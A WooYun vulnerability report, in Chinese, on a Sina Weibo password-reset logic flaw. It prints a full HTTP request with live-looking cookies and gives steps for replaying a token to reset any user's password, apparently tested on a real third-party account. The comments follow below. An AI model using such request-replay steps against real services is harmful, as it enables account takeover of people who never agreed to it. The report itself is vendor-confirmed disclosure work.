当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191035

漏洞标题:新浪微博设计缺陷导致继续重置任意用户密码(狗哥大号躺枪)

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2016-03-31 11:59

修复时间:2016-05-16 15:00

公开时间:2016-05-16 15:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-11: 细节向核心白帽子及相关领域专家公开
2016-04-21: 细节向普通白帽子公开
2016-05-01: 细节向实习白帽子公开
2016-05-16: 细节向公众公开

简要描述:

新浪微博设计缺陷导致继续重置任意用户密码(狗哥大号躺枪)
本来想再拿国民老公测试一下,想想算了,总这么玩太过分了

详细说明:

邮箱找回密码 修改密码的链接如下:https://security.weibo.com/iforgot/setpwd?rand=xxx&v=xxx
修改密码的最后一步没有用到链接中的v参数

POST /iforgot/ajsetpwd HTTP/1.1
Host: security.weibo.com
Connection: keep-alive
Content-Length: 83
Accept: */*
Origin: https://security.weibo.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: https://security.weibo.com/iforgot/setpwd?rand=0368de8e6293fb188499986b2edc9747&v=6648f5b10e98fabc1f8f3ea487a40d1d
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: SINAGLOBAL=7621946109630.549.1458865578638; _s_tentry=wooyun.org; Apache=1577074479587.3948.1459154671768; ULV=1459154671823:2:2:1:1577074479587.3948.1459154671768:1458865578645; login_sid_t=af37df78d736a242c763e2765c89f691; WBStore=8b23cf4ec60a636c|undefined; un=18210058035; appkey=; SUHB=0pHxOfeAwXoecI; myuid=5890029338; SUB=_2AkMhpwLbdcPhrAZZkfgVzmLhb4VMywv0utX3NUbeEiczHBt_7j5nqSVohkN_Xd6h2GMktgHeKhkm5VWCoP0X1mfvQ3QV; SUBP=0033WrSXqPxfM72wWs9jqgMF55529P9D9W5zh7Ab4-USV8-gMNpxAHcX5JpVF020ehe0So-Reo-X; UOR=,,www.wooyun.org
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
p=ceshi123&rand=51b956f1568d0996cb60a1cb9370f9c5&randcode=0&entry=weibo&p1=ceshi123


而rand可在邮箱找回密码的过程中获取

B75687D5-E242-4360-9EEC-8714441EF7C3.png


利用步骤
1、找回密码,选择通过邮箱找回,一直走到向邮箱发送邮件的步骤
2、用找回密码过程中获取到的rand替换上面数据包中的rand,即可直接修改目标微博账号密码

漏洞证明:

87%N74JJFVWHZFJ)BLGGY]Q.jpg


狗哥躺枪

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-01 14:54

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-03-31 12:03 | 随风的风 ( 普通白帽子 | Rank:244 漏洞数:91 | 微信公众号:233sec 不定期分享各种漏洞思...)

    @疯狗 还有大号?

  2. 2016-03-31 12:04 | 泳少 ( 普通白帽子 | Rank:255 漏洞数:83 | ★ 梦想这条路踏上了,跪着也要...)

    @sqlfeng

  3. 2016-03-31 12:15 | hecate ( 普通白帽子 | Rank:810 漏洞数:127 | ®高级安全工程师 | WooYun认证√)

    @疯狗

  4. 2016-03-31 12:21 | 孤梦° ( 普通白帽子 | Rank:143 漏洞数:48 )

    前排

  5. 2016-03-31 12:33 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    。。。。。。。 放开我,还个孩纸啊

  6. 2016-03-31 12:36 | sqlfeng ( 普通白帽子 | Rank:573 漏洞数:74 | 嗨)

    被你先了一步..

  7. 2016-03-31 12:38 | king7 ( 普通白帽子 | Rank:1857 漏洞数:248 | 3P is the life I want to live.)

    这么说可以查看狗哥和妹子的私信了???

  8. 2016-03-31 12:42 | zsmj ( 普通白帽子 | Rank:223 漏洞数:34 | 蛛丝马迹!)

    真会玩,有考虑过狗哥的感受么?

  9. 2016-03-31 13:50 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:4781 漏洞数:368 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @疯狗 还有大号?

  10. 2016-03-31 13:58 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    还有这漏洞 哈哈 我也去测测

  11. 2016-03-31 14:30 | yzy9952 ( 实习白帽子 | Rank:47 漏洞数:9 | yzy9952)

    mark

  12. 2016-03-31 15:09 | linkey ( 实习白帽子 | Rank:87 漏洞数:38 | sqlmap的超爱好者)

    还来 …又是一炮

  13. 2016-03-31 15:54 | 小红猪 ( 普通白帽子 | Rank:322 漏洞数:58 | little red pig!)

    牛逼,求带

  14. 2016-03-31 16:23 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    66666

  15. 2016-04-01 08:40 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    66666